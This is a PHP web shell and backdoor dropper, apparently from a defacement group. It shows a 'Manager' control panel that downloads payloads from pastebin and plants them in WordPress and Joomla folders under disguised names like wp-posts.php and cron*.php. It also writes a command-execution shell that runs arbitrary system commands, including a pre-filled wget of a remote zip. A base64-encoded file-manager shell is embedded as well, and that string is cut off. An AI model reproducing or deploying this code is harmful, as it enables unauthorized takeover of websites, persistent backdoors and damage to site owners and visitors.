Dejanctor

1. // <================================================>
2. $wordpress = 0; // wordpress Activité
3. // <================================================>
4. $wp_2 = 0; // multipart Activité
5. // <================================================>
6. $multipartdexter = 1; // multipart Activité
7. // <================================================>
8. $sexhub = 0; // Joomla & wordpress working in public_html/......
9. // <================================================>
10. set_time_limit(0);
11. error_reporting(0);
12. echo "
13. <style>
14. .myButton {
15. -moz-box-shadow:inset -1px 0px 50px 0px #fff6af;
16. -webkit-box-shadow:inset -1px 0px 50px 0px #fff6af;
17. background:-moz-linear-gradient(top, #ffec64 5%, #ffab23 100%);
18. background:linear-gradient(to bottom, #ffec64 5%, #ffab23 100%);
19. filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffec64', endColorstr='#ffab23',GradientType=0);
20. background-color:#ffec64;
21. -moz-border-radius:7px;
22. -webkit-border-radius:7px;
23. border-radius:7px;
24. border:1px solid #ffaa22;
25. display:inline-block;
26. cursor:pointer;
27. color:#333333;
28. font-family:Arial;
29. font-size:13px;
30. padding:4px 5px;
31. text-decoration:none;
32. text-shadow:10px 0px 41px #ffee66;
33. }
34. </style>
35. ";
36. $script = basename($_SERVER['SCRIPT_NAME']);
37. $azzouz = $_SERVER['HTTP_HOST'];
38. $azerty = $_SERVER['SERVER_NAME'];
39. $abcd = dirname($_SERVER['PHP_SELF']) ;
40. $url = "$azerty/$abcd";
41. echo "<link href='http://www.iconj.com/ico/g/0/g0f05tlicq.ico' rel='shortcut icon' type='image/x-icon'>
42. <title>Manager</title><br>
43. <form method='POST'>
44. <a href='$script?ls' class='myButton'>ScanDir</a>
45. <a href='$script?random' class='myButton'>Random</a>
46. <a href='$script?kill' class='myButton' style='color: blue;'>Remove</a>
47. <a href='$script?dexter' class='myButton'>Execute</a>
48. <a href='$script?presta' class='myButton'>PreSheap</a>
49. <a href='$script?wordpress' class='myButton'>wordpress</a>
50. <a href='$script?upload' class='myButton'>Upload</a>
51. <a href='$script?lite' class='myButton'>Shell</a>
52. <a href='$script?reset' class='myButton'>Reset</a>
53. </form>";
54. ///////////////////////////////////////
55. if($sexhub !== 1 ){}else{
56. $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
57. $xcbv = "./modules/posts.php";
58. $wxcv=fopen($xcbv,'w');
59. fwrite($wxcv,$fgh);
60. $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
61. $jklm = "./modules/value.php";
62. $sdf=fopen($jklm,'w');
63. fwrite($sdf,$rtyu);
64. $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
65. $uio = "./modules/links.php";
66. $cvb=fopen($uio,'w');
67. fwrite($cvb,$ghjk);
68. $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
69. $xcbv = "./wp-admin/posts.php";
70. $wxcv=fopen($xcbv,'w');
71. fwrite($wxcv,$fgh);
72. $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
73. $jklm = "./wp-admin/value.php";
74. $sdf=fopen($jklm,'w');
75. fwrite($sdf,$rtyu);
76. $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
77. $uio = "./wp-admin/links.php";
78. $cvb=fopen($uio,'w');
79. fwrite($cvb,$ghjk);
80. echo "<br><br>";
81. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#0a5d00"." href="."http://$azzouz/modules/links.php"." target="."_blank".">www.$azzouz/modules/wp-links.php"."</a><br>";
82. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/modules/value.php?pass=ransomware"." target="."_blank".">www.$azzouz/modules/wp-value.php"."</a><br>";
83. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/modules/posts.php"." target="."_blank".">www.$azzouz/modules/wp-posts.php"."</a>";
84. echo "<br><br>";
85. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#0a5d00"." href="."http://$azzouz/wp-admin/links.php"." target="."_blank".">www.$azzouz/wp-admin/wp-links.php"."</a><br>";
86. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-admin/value.php?pass=ransomware"." target="."_blank".">www.$azzouz/wp-admin/wp-value.php"."</a><br>";
87. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-admin/posts.php"." target="."_blank".">www.$azzouz/wp-admin/wp-posts.php"."</a>";
88. echo "<br>";
89. }
90. ///////////////////////////////////////
91. if($wordpress !== 1 ){}else{
92. $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
93. $xcbv = "../../../../wp-posts.php";
94. $wxcv=fopen($xcbv,'w');
95. fwrite($wxcv,$fgh);
96. $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
97. $jklm = "../../../../wp-value.php";
98. $sdf=fopen($jklm,'w');
99. fwrite($sdf,$rtyu);
100. $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
101. $uio = "../../../../wp-links.php";
102. $cvb=fopen($uio,'w');
103. fwrite($cvb,$ghjk);
104. }
105. ///////////////////////////////////////
106. if($wp_2 !== 1 ){}else{
107. $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
108. $xcbv = "../../../wp-posts.php";
109. $wxcv=fopen($xcbv,'w');
110. fwrite($wxcv,$fgh);
111. $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
112. $jklm = "../../../wp-value.php";
113. $sdf=fopen($jklm,'w');
114. fwrite($sdf,$rtyu);
115. $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
116. $uio = "../../../wp-links.php";
117. $cvb=fopen($uio,'w');
118. fwrite($cvb,$ghjk);
119. }
120. ///////////////////////////////////////
121. $multipart = '
122. <html>
123. <br>
124. <div style="text-align: left;">
125. <form method="post" enctype="multipart/form-data">
126. <input name="cmd" value="wget http://batut.com.ua/misc/farbtastic/ms-authorze.zip" size="50" type="text"/>
127. <input value="Execute" id="Execute" type="submit"/>
128. <br></div>
129. </form>
130. <form method="post" enctype="multipart/form-data">
131. <input name="cmd" value="unzip ms-authorze.zip" size="50" type="text"/>
132. <input value="Execute" id="Execute" type="submit"/>
133. <br></div></form>
134. <br>
135. <br>
136. <?php
137. $azerty = $_SERVER["SERVER_NAME"];
138. $abcd = dirname($_SERVER["PHP_SELF"]) ;
139. $url = "$azerty/$abcd";
140. echo "<br><br>";
141. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#0a5d00"." href="."http://$url/wp-authorze.php"." target="."_blank".">www.$url/wp-authorze.php"."</a><br>";
142. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$url/wp-views.php?pass=ransomware"." target="."_blank".">www.$url/wp-views.php"."</a><br>";
143. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$url/wp-output.php"." target="."_blank".">www.$url/wp-output.php"."</a>";
144. echo "<br><br>";
145. if (isset($_POST["cmd"])) {
146. function exe($cmd) {
147. if(function_exists("system")) {
148. @ob_start();
149. @system($cmd);
150. $buff = @ob_get_contents();
151. @ob_end_clean();
152. return $buff;
153. } elseif(function_exists("exec")) {
154. @exec($cmd,$results);
155. $buff = "";
156. foreach($results as $result) {
157. $buff .= $result;
158. } return $buff;
159. } elseif(function_exists("passthru")) {
160. @ob_start();
161. @passthru($cmd);
162. $buff = @ob_get_contents();
163. @ob_end_clean();
164. return $buff;
165. } elseif(function_exists("shell_exec")) {
166. $buff = @shell_exec($cmd);
167. return $buff;
168. }
169. }
170. echo "<pre>".exe($_POST["cmd"])."</pre>";
171. } //Dexter Haxor ./www.fb.com/dreamdeface.org
172. ?>
173. ';
174. if($multipartdexter !== 1 ){}else{
175. $auth=fopen("wp-multipart.php",'w');
176. fwrite($auth,$multipart);
177. $auth2=fopen("../../wp-multipart.php",'w');
178. fwrite($auth2,$multipart);
179. $auth2=fopen("../../../wp-multipart.php",'w');
180. fwrite($auth2,$multipart);
181. $auth3=fopen("../../../../wp-multipart.php",'w');
182. fwrite($auth3,$multipart);
183. }
184. echo "<br>";
185. echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."https://$azzouz/index.php"." target="."_blank".">www.$azzouz/index.php"."</a><br>";
186. echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$url/wp-multipart.php"." target="."_blank".">www.$url/wp-multipart.php"."</a><br>";
187. echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$azzouz/wp-multipart.php"." target="."_blank".">www.$azzouz/wp-multipart.php"."</a><br>";
188. echo "<br>";
189. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-posts.php"." target="."_blank".">www.$azzouz/wp-posts.php"."</a><br>";
190. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-value.php?pass=ransomware"." target="."_blank".">www.$azzouz/wp-value.php"."</a><br>";
191. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-links.php"." target="."_blank".">www.$azzouz/wp-links.php"."</a>";
192. echo "<br><br>";
193. if(isset($_GET["wordpress"])){
194. $sss=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
195. foreach($sss as $pa){
196. $p1=array("$pa/wp-admin/user/");
197. foreach($p1 as $path){
198. if (file_exists("$path")){
199. $print = $path."cron".rand(999, 123).".php";
200. //-------------------------------------------
201. $url = 'https://pastebin.com/raw/jWBjgLd2';
202. $st = curl_init();
203. curl_setopt($st,CURLOPT_URL,$url);
204. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
205. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
206. $html = curl_exec($st);
207. curl_close($st);
208. //-------------------------------------------
209. $save=fopen($print,'w');
210. fwrite($save,$html);
211. $print = "__$print";
212. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
213. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
214. break;
215. }
216. $p2=array("$pa/wp-content/plugins/");
217. foreach($p2 as $path){
218. if (file_exists("$path")){
219. $print = $path."cron".rand(999, 123).".php";
220. //-------------------------------------------
221. $url = 'https://pastebin.com/raw/jWBjgLd2';
222. $st = curl_init();
223. curl_setopt($st,CURLOPT_URL,$url);
224. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
225. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
226. $html = curl_exec($st);
227. curl_close($st);
228. //-------------------------------------------
229. $save=fopen($print,'w');
230. fwrite($save,$html);
231. $print = "__$print";
232. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
233. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
234. }}
235. }
236. //////
237. $p3=array("$pa/wp-admin/network/");
238. foreach($p3 as $path){
239. if (file_exists("$path")){
240. $print = $path."system".rand(999, 123).".php";
241. //-------------------------------------------
242. $url = 'https://pastebin.com/raw/nxJA9qiA';
243. $st = curl_init();
244. curl_setopt($st,CURLOPT_URL,$url);
245. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
246. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
247. $html = curl_exec($st);
248. curl_close($st);
249. //-------------------------------------------
250. $save=fopen($print,'w');
251. fwrite($save,$html);
252. $print = "__$print";
253. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
254. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
255. break;
256. }
257. $p4=array("$pa/wp-content/languages/");
258. foreach($p4 as $path){
259. if (file_exists("$path")){
260. $print = $path."system".rand(999, 123).".php";
261. //-------------------------------------------
262. $url = 'https://pastebin.com/raw/nxJA9qiA';
263. $st = curl_init();
264. curl_setopt($st,CURLOPT_URL,$url);
265. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
266. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
267. $html = curl_exec($st);
268. curl_close($st);
269. //-------------------------------------------
270. $save=fopen($print,'w');
271. fwrite($save,$html);
272. $print = "__$print";
273. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
274. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
275. }}
276. }
277. //////
278. $p5=array("$pa/wp-content/themes/");
279. foreach($p5 as $path){
280. if (file_exists("$path")){
281. $print = $path."view".rand(999, 123).".php";
282. //-------------------------------------------
283. $url = 'https://pastebin.com/raw/wL527WWg';
284. $st = curl_init();
285. curl_setopt($st,CURLOPT_URL,$url);
286. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
287. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
288. $html = curl_exec($st);
289. curl_close($st);
290. //-------------------------------------------
291. $save=fopen($print,'w');
292. fwrite($save,$html);
293. $print = "__$print";
294. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
295. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
296. break;
297. }
298. $p6=array("$pa/wp-admin/");
299. foreach($p6 as $path){
300. if (file_exists("$path")){
301. $print = $path."view".rand(999, 123).".php";
302. //-------------------------------------------
303. $url = 'https://pastebin.com/raw/wL527WWg';
304. $st = curl_init();
305. curl_setopt($st,CURLOPT_URL,$url);
306. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
307. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
308. $html = curl_exec($st);
309. curl_close($st);
310. //-------------------------------------------
311. $save=fopen($print,'w');
312. fwrite($save,$html);
313. $print = "__$print";
314. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
315. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
316. }}
317. }
318. }
319. }
320. if(isset($_GET["lite"])){
321. $al7wa = base64_decode('PD9waHAKc2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKCmlmKGdldF9tYWdpY19xdW90ZXNfZ3BjKCkpewogICAgZm9yZWFjaCgkX1BPU1QgYXMgJGtleT0+JHZhbHVlKXsKICAgICAgICAkX1BPU1RbJGtleV0gPSBzdHJpcHNsYXNoZXMoJHZhbHVlKTsKICAgIH0KfQplY2hvICc8IURPQ1RZUEUgSFRNTD4KPEhUTUw+CjxIRUFEPgo8bGluayBocmVmPSIiIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiPgo8bGluayBocmVmPSJodHRwOi8vd3d3Lmljb25qLmNvbS9pY28vZy8wL2cwZjA1dGxpY3EuaWNvIiByZWw9InNob3J0Y3V0IGljb24iIHR5cGU9ImltYWdlL3gtaWNvbiI+Cjx0aXRsZT5NYW5hZ2VyPC90aXRsZT4KPHN0eWxlPgpib2R5ewogICAgZm9udC1mYW1pbHk6ICJSYWNpbmcgU2FucyBPbmUiLCBjdXJzaXZlOwogICAgYmFja2dyb3VuZC1jb2xvcjogI2U2ZTZlNjsKICAgIHRleHQtc2hhZG93OjBweCAwcHggMXB4ICM3NTc1NzU7Cn0KI2NvbnRlbnQgdHI6aG92ZXJ7CiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjNjM2MjYzOwogICAgdGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmY7Cn0KI2NvbnRlbnQgLmZpcnN0ewogICAgYmFja2dyb3VuZC1jb2xvcjogc2lsdmVyOwp9CiNjb250ZW50IC5maXJzdDpob3ZlcnsKICAgIGJhY2tncm91bmQtY29sb3I6IHNpbHZlcjsKICAgIHRleHQtc2hhZG93OjBweCAwcHggMXB4ICM3NTc1NzU7Cn0KdGFibGV7CiAgICBib3JkZXI6IDFweCAjMDAwMDAwIGRvdHRlZDsKfQpIMXsKICAgIGZvbnQtZmFtaWx5OiAiUnllIiwgY3Vyc2l2ZTsKfQphewogICAgY29sb3I6ICMwMDA7CiAgICB0ZXh0LWRlY29yYXRpb246IG5vbmU7Cn0KYTpob3ZlcnsKICAgIGNvbG9yOiAjZmZmOwogICAgdGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmZmZmY7Cn0KaW5wdXQsc2VsZWN0LHRleHRhcmVhewogICAgYm9yZGVyOiAxcHggIzAwMDAwMCBzb2xpZDsKICAgIC1tb3otYm9yZGVyLXJhZGl1czogNXB4OwogICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOjVweDsKICAgIGJvcmRlci1yYWRpdXM6NXB4Owp9Cjwvc3R5bGU+CjwvSEVBRD4KPEJPRFk+CjxIMT48Y2VudGVyPjwvY2VudGVyPjwvSDE+Cjx0YWJsZSB3aWR0aD0iNzAwIiBib3JkZXI9IjAiIGNlbGxwYWRkaW5nPSIzIiBjZWxsc3BhY2luZz0iMSIgYWxpZ249ImNlbnRlciI+Cjx0cj48dGQ+Q3VycmVudCBQYXRoIDogJzsKaWYoaXNzZXQoJF9HRVRbJ3BhdGgnXSkpewogICAgJHBhdGggPSAkX0dFVFsncGF0aCddOyAgIAp9ZWxzZXsKICAgICRwYXRoID0gZ2V0Y3dkKCk7Cn0KJHBhdGggPSBzdHJfcmVwbGFjZSgnXFwnLCcvJywkcGF0aCk7CiRwYXRocyA9IGV4cGxvZGUoJy8nLCRwYXRoKTsKCmZvcmVhY2goJHBhdGhzIGFzICRpZD0+JHBhdCl7CiAgICBpZigkcGF0ID09ICcnICYmICRpZCA9PSAwKXsKICAgICAgICAkYSA9IHRydWU7CiAgICAgICAgZWNobyAnPGEgaHJlZj0iP3BhdGg9LyI+LzwvYT4nOwogICAgICAgIGNvbnRpbnVlOwogICAgfQogICAgaWYoJHBhdCA9PSAnJykgY29udGludWU7CiAgICBlY2hvICc8YSBocmVmPSI/cGF0aD0nOwogICAgZm9yKCRpPTA7JGk8PSRpZDskaSsrKXsKICAgICAgICBlY2hvICIkcGF0aHNbJGldIjsKICAgICAgICBpZigkaSAhPSAkaWQpIGVjaG8gIi8iOwogICAgfQogICAgZWNobyAnIj4nLiRwYXQuJzwvYT4vJzsKfQplY2hvICc8L3RkPjwvdHI+PHRyPjx0ZD4nOwppZihpc3NldCgkX0ZJTEVTWydmaWxlJ10pKXsKICAgIGlmKGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCRwYXRoLicvJy4kX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpewogICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+RmlsZSBVcGxvYWQgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgIH1lbHNlewogICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPkZpbGUgVXBsb2FkIEVycm9yLjwvZm9udD48YnIgLz4nOwogICAgfQp9CmVjaG8gJzxmb3JtIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCI+ClVwbG9hZCBGaWxlIDogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIC8+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJ1cGxvYWQiIC8+CjwvZm9ybT4KPC90ZD48L3RyPic7CmlmKGlzc2V0KCRfR0VUWydmaWxlc3JjJ10pKXsKICAgIGVjaG8gIjx0cj48dGQ+Q3VycmVudCBGaWxlIDogIjsKICAgIGVjaG8gJF9HRVRbJ2ZpbGVzcmMnXTsKICAgIGVjaG8gJzwvdHI+PC90ZD48L3RhYmxlPjxiciAvPic7CiAgICBlY2hvKCc8cHJlPicuaHRtbHNwZWNpYWxjaGFycyhmaWxlX2dldF9jb250ZW50cygkX0dFVFsnZmlsZXNyYyddKSkuJzwvcHJlPicpOwp9ZWxzZWlmKGlzc2V0KCRfR0VUWydvcHRpb24nXSkgJiYgJF9QT1NUWydvcHQnXSAhPSAnZGVsZXRlJyl7CiAgICBlY2hvICc8L3RhYmxlPjxiciAvPjxjZW50ZXI+Jy4kX1BPU1RbJ3BhdGgnXS4nPGJyIC8+PGJyIC8+JzsKICAgIGlmKCRfUE9TVFsnb3B0J10gPT0gJ2NobW9kJyl7CiAgICAgICAgaWYoaXNzZXQoJF9QT1NUWydwZXJtJ10pKXsKICAgICAgICAgICAgaWYoY2htb2QoJF9QT1NUWydwYXRoJ10sJF9QT1NUWydwZXJtJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+Q2hhbmdlIFBlcm1pc3Npb24gRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5DaGFuZ2UgUGVybWlzc2lvbiBFcnJvci48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9IlBPU1QiPgogICAgICAgIFBlcm1pc3Npb24gOiA8aW5wdXQgbmFtZT0icGVybSIgdHlwZT0idGV4dCIgc2l6ZT0iNCIgdmFsdWU9Iicuc3Vic3RyKHNwcmludGYoJyVvJywgZmlsZXBlcm1zKCRfUE9TVFsncGF0aCddKSksIC00KS4nIiAvPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRfUE9TVFsncGF0aCddLiciPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9ImNobW9kIj4KICAgICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR28iIC8+CiAgICAgICAgPC9mb3JtPic7CiAgICB9ZWxzZWlmKCRfUE9TVFsnb3B0J10gPT0gJ3JlbmFtZScpewogICAgICAgIGlmKGlzc2V0KCRfUE9TVFsnbmV3bmFtZSddKSl7CiAgICAgICAgICAgIGlmKHJlbmFtZSgkX1BPU1RbJ3BhdGgnXSwkcGF0aC4nLycuJF9QT1NUWyduZXduYW1lJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+Q2hhbmdlIE5hbWUgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5DaGFuZ2UgTmFtZSBFcnJvci48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfQogICAgICAgICAgICAkX1BPU1RbJ25hbWUnXSA9ICRfUE9TVFsnbmV3bmFtZSddOwogICAgICAgIH0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9IlBPU1QiPgogICAgICAgIE5ldyBOYW1lIDogPGlucHV0IG5hbWU9Im5ld25hbWUiIHR5cGU9InRleHQiIHNpemU9IjIwIiB2YWx1ZT0iJy4kX1BPU1RbJ25hbWUnXS4nIiAvPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRfUE9TVFsncGF0aCddLiciPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9InJlbmFtZSI+CiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkdvIiAvPgogICAgICAgIDwvZm9ybT4nOwogICAgfWVsc2VpZigkX1BPU1RbJ29wdCddID09ICdlZGl0Jyl7CiAgICAgICAgaWYoaXNzZXQoJF9QT1NUWydzcmMnXSkpewogICAgICAgICAgICAkZnAgPSBmb3BlbigkX1BPU1RbJ3BhdGgnXSwndycpOwogICAgICAgICAgICBpZihmd3JpdGUoJGZwLCRfUE9TVFsnc3JjJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+RWRpdCBGaWxlIERvbmUuPC9mb250PjxiciAvPic7CiAgICAgICAgICAgIH1lbHNlewogICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+RWRpdCBGaWxlIEVycm9yLjwvZm9udD48YnIgLz4nOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGZjbG9zZSgkZnApOwogICAgICAgIH0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9IlBPU1QiPgogICAgICAgIDx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjAgbmFtZT0ic3JjIj4nLmh0bWxzcGVjaWFsY2hhcnMoZmlsZV9nZXRfY29udGVudHMoJF9QT1NUWydwYXRoJ10pKS4nPC90ZXh0YXJlYT48YnIgLz4KICAgICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXRoIiB2YWx1ZT0iJy4kX1BPU1RbJ3BhdGgnXS4nIj4KICAgICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJvcHQiIHZhbHVlPSJlZGl0Ij4KICAgICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR28iIC8+CiAgICAgICAgPC9mb3JtPic7CiAgICB9CiAgICBlY2hvICc8L2NlbnRlcj4nOwp9ZWxzZXsKICAgIGVjaG8gJzwvdGFibGU+PGJyIC8+PGNlbnRlcj4nOwogICAgaWYoaXNzZXQoJF9HRVRbJ29wdGlvbiddKSAmJiAkX1BPU1RbJ29wdCddID09ICdkZWxldGUnKXsKICAgICAgICBpZigkX1BPU1RbJ3R5cGUnXSA9PSAnZGlyJyl7CiAgICAgICAgICAgIGlmKHJtZGlyKCRfUE9TVFsncGF0aCddKSl7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPkRlbGV0ZSBEaXIgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5EZWxldGUgRGlyIEVycm9yLjwvZm9udD48YnIgLz4nOwogICAgICAgICAgICB9CiAgICAgICAgfWVsc2VpZigkX1BPU1RbJ3R5cGUnXSA9PSAnZmlsZScpewogICAgICAgICAgICBpZih1bmxpbmsoJF9QT1NUWydwYXRoJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+RGVsZXRlIEZpbGUgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5EZWxldGUgRmlsZSBFcnJvci48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KICAgIGVjaG8gJzwvY2VudGVyPic7CiAgICAkc2NhbmRpciA9IHNjYW5kaXIoJHBhdGgpOwogICAgZWNobyAnPGRpdiBpZD0iY29udGVudCI+PHRhYmxlIHdpZHRoPSI3MDAiIGJvcmRlcj0iMCIgY2VsbHBhZGRpbmc9IjMiIGNlbGxzcGFjaW5nPSIxIiBhbGlnbj0iY2VudGVyIj4KICAgIDx0ciBjbGFzcz0iZmlyc3QiPgogICAgICAgIDx0ZD48Y2VudGVyPk5hbWU8L2NlbnRlcj48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPlNpemU8L2NlbnRlcj48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPlBlcm1pc3Npb25zPC9jZW50ZXI+PC90ZD4KICAgICAgICA8dGQ+PGNlbnRlcj5PcHRpb25zPC9jZW50ZXI+PC90ZD4KICAgIDwvdHI+JzsKCiAgICBmb3JlYWNoKCRzY2FuZGlyIGFzICRkaXIpewogICAgICAgIGlmKCFpc19kaXIoIiRwYXRoLyRkaXIiKSB8fCAkZGlyID09ICcuJyB8fCAkZGlyID09ICcuLicpIGNvbnRpbnVlOwogICAgICAgIGVjaG8gIjx0cj4KICAgICAgICA8dGQ+PGEgaHJlZj1cIj9wYXRoPSRwYXRoLyRkaXJcIj4kZGlyPC9hPjwvdGQ+CiAgICAgICAgPHRkPjxjZW50ZXI+LS08L2NlbnRlcj48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPiI7CiAgICAgICAgaWYoaXNfd3JpdGFibGUoIiRwYXRoLyRkaXIiKSkgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj4nOwogICAgICAgIGVsc2VpZighaXNfcmVhZGFibGUoIiRwYXRoLyRkaXIiKSkgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+JzsKICAgICAgICBlY2hvIHBlcm1zKCIkcGF0aC8kZGlyIik7CiAgICAgICAgaWYoaXNfd3JpdGFibGUoIiRwYXRoLyRkaXIiKSB8fCAhaXNfcmVhZGFibGUoIiRwYXRoLyRkaXIiKSkgZWNobyAnPC9mb250Pic7CiAgICAgICAgCiAgICAgICAgZWNobyAiPC9jZW50ZXI+PC90ZD4KICAgICAgICA8dGQ+PGNlbnRlcj48Zm9ybSBtZXRob2Q9XCJQT1NUXCIgYWN0aW9uPVwiP29wdGlvbiZwYXRoPSRwYXRoXCI+CiAgI